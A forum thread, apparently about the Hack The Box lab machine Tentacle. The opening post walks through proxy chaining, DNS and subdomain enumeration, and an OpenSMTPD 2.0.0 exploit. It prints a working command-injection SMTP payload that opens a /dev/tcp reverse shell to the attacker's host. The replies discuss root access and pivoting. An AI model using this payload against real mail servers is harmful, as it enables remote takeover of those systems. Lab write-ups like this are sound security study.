TUTORIAL Tentacle Foothold tutorial
by lingling40hrs - January 29, 2021 at 05:28 PM
#1
Nmap scan revealed port 3128, which is a Squid proxy. Also, opening 10.10.10.224:3128 gave us two pieces of information: a username j.nakazawa@realcorp.htb and a subdomain srv01.realcorp.htb.
Running AS-REP roasting for that username gave us a hash which is a **RABBIT HOLE**:
GetNPUsers.py -dc-ip REALCORP.HTB REALCORP.HTB/j.nakazawa -no-pass -format hashcat
Now, running DNS enumeration, we get 3 hosts:
dnsenum --threads 64 --dnsserver 10.10.10.224 -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt realcorp.htb
Result:
ns.realcorp.htb.                        259200  IN    A        10.197.243.77
proxy.realcorp.htb.                      259200  IN    CNAME    ns.realcorp.htb.
ns.realcorp.htb.                        259200  IN    A        10.197.243.77
wpad.realcorp.htb.                      259200  IN    A        10.197.243.31
ns.realcorp.htb.                        259200  IN    A        10.197.243.77
But no internal IP is accessible. So we add the proxy to our proxychains config, then run nmap on 127.0.0.1; the result shows the same ports, plus a new one: kpasswd5.
# /etc/proxychains.conf
http 10.10.10.224 3128

proxychains nmap -sT --min-rate 1000 -sC -sV -v -oN nmap/pivoted_77 127.0.0.1
But from there as well we are not able to access any IP, so maybe the proxy doesn't like incoming traffic. So we add another entry to our proxychains config to route the packets through 10.10.10.224:3128 -> 127.0.0.1:3128. Then suddenly the IP 10.197.243.77 became accessible.
# /etc/proxychains.conf
http 10.10.10.224 3128
http 127.0.0.1 3128

proxychains nmap -sT --min-rate 1000 -sC -sV -v -oN nmap/pivoted_77 10.197.243.77
Now, here as well we have a Squid port 3128; by adding this proxy too, another IP, 10.197.243.31, became accessible, with port 80 open.
http 10.10.10.224 3128
http 127.0.0.1 3128
http 10.197.243.77 3128

proxychains nmap -sT --min-rate 1000 -sC -sV -v -oN nmap/pivoted_77 10.197.243.31

Now we run WFUZZ for subdomains and for dirbusting. Dirbusting didn't yield anything, but subdomain enumeration gave me the wpad subdomain.
proxychains4 -q wfuzz -t64 -c -z file,/usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H "Host: FUZZ.realcorp.htb" --hh 4057 http://10.197.243.31/ | tee realcorp_fuzz_lastip

"wpad.realcorp.htb"
Now, wpad is a very strong clue that it's a WPAD subdomain, so we got the wpad.dat file, which is the default config file:
[130] % proxychains curl http://wpad.realcorp.htb/wpad.dat
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain  ...  10.10.10.224:3128  ...  127.0.0.1:3128  ...  10.197.243.77:3128  ...  10.197.243.31:80  ...  OK
function FindProxyForURL(url, host) {
    if (dnsDomainIs(host, "realcorp.htb"))
        return "DIRECT";
    if (isInNet(dnsResolve(host), "10.197.243.0", "255.255.255.0"))
        return "DIRECT";
    if (isInNet(dnsResolve(host), "10.241.251.0", "255.255.255.0"))
        return "DIRECT";

    return "PROXY proxy.realcorp.htb:3128";
}
So, we already know the 10.197.243.0 network; we now need to check out 10.241.251.0. I ran nmap against the entire /24 with the top ports and saw that 10.241.251.113 has an SMTP port open, running OpenSMTPD.
proxychains nmap -sT --min-rate 2500 -Pn 10.241.251.0/24
# then
proxychains nmap -sT -sC -sV --min-rate 2500 -Pn 10.241.251.113

PORT  STATE SERVICE VERSION
25/tcp open  smtp    OpenSMTPD
| smtp-commands: smtp.realcorp.htb Hello nmap.scanme.org [10.241.251.1], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP,
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
Service Info: Host: smtp.realcorp.htb
This has multiple ready-made exploits. I used the Qualys payload from here: https://www.qualys.com/2020/01/28/cve-20...nsmtpd.txt which Metasploit adopted as well and is a genius of a payload. We saw that the default RCPT TO:<root> didn't work, so we changed it to RCPT TO:<j.nakazawa@realcorp.htb> instead and voilà, we have a reverse shell.
Now, proxychains nc 10.241.251.113 25:
HELO x
MAIL FROM:<;for d in x t J z 5 o N G K 9 3 B 1 n Y;do read d;done;bash;exit 0;>
RCPT TO:<j.nakazawa@realcorp.htb>
DATA

#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
0<&95-;exec 95<>/dev/tcp/<yourip>/4444;sh <&95 >&95 2>&95

#2
What about the root part? Any nudge for it would be helpful.
#3
(January 30, 2021 at 04:03 AM)jenna_js Wrote: What about the root part? Any nudge for it would be helpful.
I know root, if I can get the shell to pop. What exploit are you using exactly?
#4
(January 29, 2021 at 05:28 PM)lingling40hrs Wrote: Nmap scan revealed port 3128, which is a Squid proxy. Also, opening 10.10.10.224:3128 gave us two pieces of information: a username j.nakazawa@realcorp.htb and a subdomain srv01.realcorp.htb.

Got a rev shell as root, but can't see anything. Idk why I got a shell as root.
#5
(January 30, 2021 at 08:16 AM)modamanitha Wrote:
(January 29, 2021 at 05:28 PM)lingling40hrs Wrote: Nmap scan revealed port 3128, which is a Squid proxy. Also, opening 10.10.10.224:3128 gave us two pieces of information: a username j.nakazawa@realcorp.htb and a subdomain srv01.realcorp.htb.

Got a rev shell as root, but can't see anything. Idk why I got a shell as root.

Because you are root on the SMTP server. Now you have to pivot.
